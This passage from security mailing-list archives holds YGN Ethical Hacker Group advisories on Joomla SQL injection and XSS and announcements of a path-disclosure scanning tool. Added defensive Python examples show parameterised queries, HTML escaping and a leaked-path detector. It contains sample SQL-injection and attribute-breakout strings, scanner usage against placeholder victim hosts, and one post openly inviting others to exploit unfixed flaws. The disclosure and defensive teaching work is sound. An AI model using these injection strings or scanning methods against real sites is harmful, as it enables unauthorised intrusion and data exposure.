http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg


3. DISCLOSURE TIME-LINE


2010-10-06  : Notified Joomla! Security Strike Team
2010-11-01  : Vulnerability disclosed
2010-11-05  : Patched version (1.5.22) released

4. VENDOR

Joomla! Developer Team
http://www.joomla.org
http://www.joomla.org/download.html



[Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-10-31 Thread YGN Ethical Hacker Group
1. VULNERABILITY DESCRIPTION


Potential SQL Injection Flaws were detected in Joomla! CMS version
1.5.20. These flaws were reported along with our Cross Site Scripting Flaw
which was fixed in 1.5.21. Developers believed that our reported SQL
Injection flaws are not fully exploitable because of Joomla! built-in
string filters, and they were not fixed in 1.5.21, which is currently the
latest version.

As a result, we disclosed these flaws in order for someone to exploit
them to the next maximum level.


2. PROOF-OF-CONCEPT/EXPLOIT

http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg


3. DISCLOSURE TIME-LINE


2010-10-06  : Notified Joomla! Security Strike Team
2010-11-01  : Vulnerability disclosed


4. VENDOR

Joomla! Developer Team
http://www.joomla.org
http://www.joomla.org/download.html



# YGN Ethical Hacker Group
# http://yehg.net
# 2010-11-1


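Both SQL injection advisories above (MyBB's keywords parameter in /search.php and /private.php, and Joomla's filter_order and filter_order_Dir ordering parameters) come down to two defects: a search string concatenated into a WHERE clause, and an ORDER BY column or direction taken straight from the request. The following added example is not code from either project; it uses a constructed in-memory SQLite table and a constructed tautology of the shape shown in the MyBB PoC, and puts the concatenation beside a bound parameter, then shows an allow-list for ORDER BY, which cannot be bound as a parameter.

```python
import sqlite3

ALLOWED_ORDER_COLUMNS = {"pid", "subject", "dateline"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}

# Constructed search string of the shape shown in the MyBB PoC above.
SAMPLE_KEYWORDS = "' OR 'a'='a"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for a forum's posts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE posts (pid INTEGER PRIMARY KEY, subject TEXT, dateline INTEGER)")
    conn.executemany(
        "INSERT INTO posts (subject, dateline) VALUES (?, ?)",
        [("welcome thread", 100), ("private note", 200), ("search tips", 300)],
    )
    return conn


def search_unsafe(conn, keywords: str) -> list:
    """The defect: the keyword string is spliced into the statement, so a
    quote in it changes the structure of the query."""
    sql = f"SELECT pid FROM posts WHERE subject LIKE '%{keywords}%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, keywords: str) -> list:
    """Bound parameter: the driver passes the value separately from the
    statement text, so it can only ever be compared as data."""
    sql = "SELECT pid FROM posts WHERE subject LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{keywords}%",))]


def list_ordered(conn, order_col: str, order_dir: str) -> list:
    """ORDER BY identifiers cannot be bound as parameters, so the request
    values are used only to pick from an allow list; the SQL is built from
    the allow-listed names, never from the raw input."""
    col = order_col if order_col in ALLOWED_ORDER_COLUMNS else "pid"
    wanted_dir = order_dir.upper()
    direction = wanted_dir if wanted_dir in ALLOWED_DIRECTIONS else "ASC"
    sql = f"SELECT pid FROM posts ORDER BY {col} {direction}"
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print(search_unsafe(db, SAMPLE_KEYWORDS))      # [1, 2, 3]: every row
    print(search_safe(db, SAMPLE_KEYWORDS))        # []: literal does not match
    print(list_ordered(db, "dateline", "desc"))    # [3, 2, 1]
    print(list_ordered(db, "dateline; --", "x"))   # [1, 2, 3]: fell back to pid ASC
```

The MyBB advisory notes that clean_keywords and clean_keywords_ft probably mitigate full exploitation; the allow-list and the bound parameter remove the question entirely, because the request value never reaches the SQL text.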
Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-10-31 Thread YGN Ethical Hacker Group
To clarify, we want excellent guys here to prove/bypass/exploit the
potential issues to enforce developers to fix rather than hiding these
issues. That's what we want to say.



[Full-disclosure] [Tool Update Announcement] inspathx

2010-10-11 Thread YGN Ethical Hacker Group
Check the update via
svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx


Info about inspathx
http://inspathx.googlecode.com/


Change Log:

-Added username and server path display in console and log output
that looks like

I, [2010-10-14 02:10:08 pid:#6848]  INFO -- : ! Username detected = [victim]
I, [2010-10-14 02:10:08 pid:#6848]  INFO -- : ! Server path extracted = [/home/victim/htdocs/]

-Added language support
-Modified the x argument so that it accepts each extension separated by
comma(s) (default: php4,php5,php6,php,asp,aspx,jsp,jspx)



[Full-disclosure] Joomla! 1.5.20 = Cross Site Scripting (XSS) Vulnerability

2010-10-09 Thread YGN Ethical Hacker Group
1. OVERVIEW

The Joomla! web application was vulnerable to Cross Site Scripting.


2. PRODUCT DESCRIPTION

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Some URLs in Joomla! do not properly escape encoded user inputs, which
leads to a cross site scripting vulnerability.
For more information about this kind of vulnerability, see OWASP Top
10 - A2, WASC-8 and
CWE-79: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting').


4. VERSIONS AFFECTED

Joomla! 1.5.20 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/


6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

Upgrade to Joomla! 1.5.21


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2010-10-04: vulnerability discovered
2010-10-06: notified vendor
2010-10-09: vendor released fix
2010-10-09: vulnerability disclosed


11. REFERENCES

Vendor Advisory URL:
http://developer.joomla.org/security/news/9-security/10-core-security/322-20101001-core-xss-vulnerabilities.html
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5.20]_cross_site_scripting(XSS)
XSS FAQ: http://www.cgisecurity.com/xss-faq.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html




-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd


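The Joomla! com_search ordering, Geeklog conf_group/subgroup and Eclipse help-server PoCs above are all one pattern: a request value echoed into an HTML attribute or into the page body without escaping for that context, so a quote ends the attribute or an angle bracket starts a new element. The following added example is not code from any of these projects; the sample values and the markup templates are constructed, and the added attribute names are inert placeholders. It renders a value with and without context-appropriate escaping, in a double-quoted attribute, a single-quoted attribute and element text, then parses the result with the standard-library HTML parser to show what a browser-side parser sees in each case.

```python
from html import escape
from html.parser import HTMLParser

# Constructed sample inputs of the shape the advisories describe: a value
# carrying a double quote to close a double-quoted attribute, a value
# carrying a single quote for a single-quoted attribute, and markup for
# the element-text case. Nothing here executes.
SAMPLE_DQ = 'newest" onmousemove=handler style=s'
SAMPLE_SQ = "'onload='handler"
SAMPLE_TEXT = "<b>footer</b>"


def render_attr(value: str, quote: str = '"', safe: bool = True) -> str:
    """Echo a request value inside a hidden input's value attribute.

    safe=False is the defect. safe=True applies html.escape(quote=True),
    which encodes & < > " and ' so the value can neither end the attribute
    nor start a new one, whichever quote style the template uses.
    """
    v = escape(value, quote=True) if safe else value
    return f'<input type="hidden" name="ordering" value={quote}{v}{quote}>'


def render_text(value: str, safe: bool = True) -> str:
    """Echo a value as element text, e.g. a site footer."""
    v = escape(value) if safe else value
    return f'<div id="footer">{v}</div>'


class TagCollector(HTMLParser):
    """Records the tags and attributes a browser-side parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(attrs)


def parse(fragment: str) -> TagCollector:
    collector = TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector


def attribute_names(fragment: str) -> list:
    """Attribute names of every start tag in the fragment, in order."""
    return [name for name, _ in parse(fragment).attrs]


def attribute_value(fragment: str, name: str):
    """Decoded value of one attribute; shows the escaped form round-trips."""
    return dict(parse(fragment).attrs).get(name)


def tag_names(fragment: str) -> list:
    return parse(fragment).tags


if __name__ == "__main__":
    print(attribute_names(render_attr(SAMPLE_DQ, '"', safe=False)))
    print(attribute_names(render_attr(SAMPLE_DQ, '"', safe=True)))
    print(tag_names(render_text(SAMPLE_TEXT, safe=False)))
    print(tag_names(render_text(SAMPLE_TEXT, safe=True)))
```

The escaped attribute still carries the original string (the parser decodes the entities back to it), which is the point: escaping changes nothing about the data, only about where the parser decides the attribute ends. Unquoted attributes are not covered by this and should not be used with user data at all.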
[Full-disclosure] [Tool Update Announcement] inspathx - Path Disclosure Finder

2010-10-08 Thread YGN Ethical Hacker Group
UPDATE

Check it out at

svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx-read-only


For those who don't know inspathx

https://code.google.com/p/inspathx/

_

WHAT

A tool that uses a local source tree to make requests to the URL and
search for path inclusion error messages. It has always been a common
problem in PHP web applications that we hate to see. We hope this tool
helps put an end to path disclosure flaws. See our article about path
disclosure.

http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt



WHY

Web application developers sometimes fail to add safety checks (for
authentication, file inclusion, etc.), so those applications are prone to
revealing sensitive information when their URLs are requested directly.
Sometimes this is a clue to a File Inclusion vulnerability. For
open-source applications, the source code can be downloaded and checked to
find such information.

This script will do this job.

   1. First you have to download source archived file of your desired OSS.
   2. Second, extract it.
   3. Third, feed its path to inspath

The inspath takes

* -d or --dir argument as the source directory (of the application)
* -u or --url argument as the target base URL (like http://victim.com)
* -t or --threads argument as the number of threads to run concurrently
  (default is 10)
* -l argument as your desired language: php, asp, aspx, jsp, all
  (default is all)
* -x argument as your desired extensions separated with the | character
  (default: php4|php5|php6|php|asp|aspx|jsp|jspx) - make sure to enclose
  multiple extensions in double quotes - see Examples

Read the related text:
http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt

Similar terms: Full Path Disclosure, Internal Path Leakage



SUPPORTED LANGUAGES

* PHP
* ASP(X)
* JSP(X)


HOW

ruby inspathx.rb -d /sources/phpmyadmin -u http://localhost/phpmyadmin -t 20

ruby inspathx.rb -d c:/sources/phpmyadmin -u http://localhost/phpmyadmin -t 20

ruby inspathx.rb -d c:/sources/dotnetnuke -u http://localhost/dotnetnuke -t 20 -l aspx

ruby inspathx.rb -d c:/sources/jspnuke -u http://localhost/jspnuke -t 20 -l jsp -x "jsp|jspx"



SAMPLE LOGS

Mambo 4.6.5 
http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_mambo_.log

WordPress 3.0.1
http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_wp_.log


REFERENCES

http://www.owasp.org/index.php/Full_Path_Disclosure

http://projects.webappsec.org/Information-Leakage

http://cwe.mitre.org/data/definitions/209.html


[Full-disclosure] [New Tool Announcement] inspath - Path Disclosure Finder

2010-09-28 Thread YGN Ethical Hacker Group
WHAT

A tool that uses a local source tree to make requests to the URL and
search for path inclusion error messages. It has always been a common
problem in PHP web applications that we hate to see. We hope this tool
helps put an end to path disclosure flaws. See our article about path
disclosure.
http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt


WHY

PHP web application developers sometimes fail to add safety checks (for
authentication, file inclusion, etc.), so those applications are prone to
revealing sensitive information when their URLs are requested directly.
Sometimes this is a clue to a Local File Inclusion vulnerability. For
open-source applications, the source code can be downloaded and checked to
find such information.

This script will do this job.

  1. First you have to download source archived file of your desired OSS.
  2. Second, extract it.
  3. Third, feed its path to inspath

The inspath takes

   * -d or --dir argument as the source directory (of the application)
   * -u or --url argument as the target base URL (like http://victim.com)
   * -t or --threads argument as the number of threads to run concurrently
     (default is 10)

Read the related text:
http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt

See the sample scan logs of latest mambo and wordpress applications:

http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_mambo_.log
http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_wp_.log


Similar terms: Full Path Disclosure, Internal Path Leakage


HOW

ruby inspath.rb -d /sources/phpmyadmin -u http://localhost/phpmyadmin -t 20

ruby inspath.rb -d c:/sources/phpmyadmin -u http://localhost/phpmyadmin -t 20


DOWNLOAD

We love svn. Check it out at

svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx-read-only


REFERENCES

http://www.owasp.org/index.php/Full_Path_Disclosure

http://projects.webappsec.org/Information-Leakage

http://cwe.mitre.org/data/definitions/209.html



Use portable bash versions if you wish:

http://www.pentesterscripting.com/discovery/web_requester

http://www.pentesterscripting.com/exploitation/bash_web_parameter_fuzzer

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd


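The two inspathx announcements above describe the technique: walk the local source tree of the deployed application, request each script's URL directly, and look for error messages that reveal the server-side path (the change log further up adds extraction of the username and server path from what is found). The following is an added Python example modelled on that description, not the tool's own Ruby code. The source tree, the URL mapping and the server responses are constructed inline so it runs offline, and it is written for checking your own deployment's responses: the same matcher can be run over a web server's error log or a proxy capture.

```python
import os
import re
import tempfile
from urllib.parse import quote

TAG_RE = re.compile(r"<[^>]+>")

# Error-message shapes that leak an absolute server path. Written for this
# example from the stock PHP and ASP.NET formats; extend for your stack.
PATH_PATTERNS = [
    # PHP: "Fatal error: ... in /home/user/htdocs/x.php on line 12"
    re.compile(r"(?:Warning|Fatal error|Notice|Parse error|Deprecated):\s+.*? in "
               r"(?P<path>/\S+|[A-Za-z]:\\\S+) on line \d+"),
    # ASP.NET error page: "Source File: C:\inetpub\wwwroot\x.aspx    Line: 5"
    re.compile(r"Source File:\s*(?P<path>[A-Za-z]:\\\S+|/\S+)"),
]

# A path under /home/<user>/ also gives away the account name.
USER_HOME_RE = re.compile(r"^/home/(?P<user>[^/]+)/")


def find_disclosed_paths(body: str) -> list:
    """Absolute server paths found in a response body (HTML tags removed
    first, since PHP wraps its error text in <b> tags)."""
    text = TAG_RE.sub("", body)
    found = []
    for pattern in PATH_PATTERNS:
        for m in pattern.finditer(text):
            if m.group("path") not in found:
                found.append(m.group("path"))
    return found


def username_from_path(path: str):
    m = USER_HOME_RE.match(path)
    return m.group("user") if m else None


def candidate_urls(source_dir: str, base_url: str,
                   exts=("php", "php4", "php5", "asp", "aspx", "jsp", "jspx")) -> list:
    """Map every script in the local source tree to its URL under the
    deployment base, the request list the announcements describe."""
    urls = []
    for root, _dirs, files in os.walk(source_dir):
        for name in files:
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext in exts:
                rel = os.path.relpath(os.path.join(root, name), source_dir)
                urls.append(base_url.rstrip("/") + "/" + quote(rel.replace(os.sep, "/")))
    return sorted(urls)


def scan(responses: dict) -> dict:
    """{url: (paths, username)} for every response that leaks a path."""
    report = {}
    for url, body in responses.items():
        paths = find_disclosed_paths(body)
        if paths:
            report[url] = (paths, username_from_path(paths[0]))
    return report


# Constructed responses, of the kind an include file returns when requested
# directly without the context its caller normally sets up.
SAMPLE_RESPONSES = {
    "http://localhost/app/inc/functions.php":
        "<b>Fatal error</b>:  Call to undefined function config() in "
        "<b>/home/victim/htdocs/inc/functions.php</b> on line <b>12</b>",
    "http://localhost/app/index.php": "<html><body>Welcome</body></html>",
    "http://localhost/app/admin/default.aspx":
        "Server Error in '/' Application.\n"
        "Source File: C:\\inetpub\\wwwroot\\app\\admin\\default.aspx    Line: 5",
}


def build_sample_tree() -> str:
    """Constructed source tree in a temporary directory."""
    d = tempfile.mkdtemp()
    for rel in ("index.php", "inc/functions.php", "admin/default.aspx", "README.txt"):
        p = os.path.join(d, *rel.split("/"))
        os.makedirs(os.path.dirname(p), exist_ok=True)
        open(p, "w").close()
    return d


if __name__ == "__main__":
    print(candidate_urls(build_sample_tree(), "http://localhost/app"))
    for url, (paths, user) in scan(SAMPLE_RESPONSES).items():
        print(url, paths, user)
```

On your own site, the fix for every hit is the same pair of settings the advisories' solutions imply: turn display_errors (or the framework's equivalent) off in production so errors go to the log rather than the response, and add the missing context check at the top of include files so they exit cleanly when loaded directly.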